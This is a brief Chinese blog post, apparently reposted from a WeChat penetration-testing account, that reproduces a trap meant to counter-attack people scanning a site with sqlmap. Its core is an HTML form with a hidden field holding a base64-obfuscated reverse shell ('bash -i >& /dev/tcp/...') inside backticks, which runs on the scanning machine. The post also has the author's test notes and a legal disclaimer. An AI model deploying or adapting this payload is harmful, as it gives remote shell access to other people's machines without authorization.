反引号:在linux中,反引号中的内容一般是一行或多行命令,当这些命令被反引号引的时候,命令执行结果就会以字符串的形式被保留下来。
首先搭建搭建个简易请求:
<html>
<head>
<meta charset="utf-8">
<title> test demo</title>
</head>
<body>
<input>search the user</input>
<form action="test.html" method="post" enctype="text/plain">
<input type='hidden' name='name' value="`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjEzNC83Nzg4IDA+JjE=| base64 -d|bash -i`"/>
<input type="submit" value='提交'>
</form>
</body>
</html>
请求包:
测试了sqlmap --data可以执行命令,但是-a一把梭没有执行,不知道为啥;而且这个好像暂时只能反制linux攻击机,反制代码太明显 有些鸡肋
原文始发于微信公众号(fly的渗透学习笔记):sqlamp反制复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论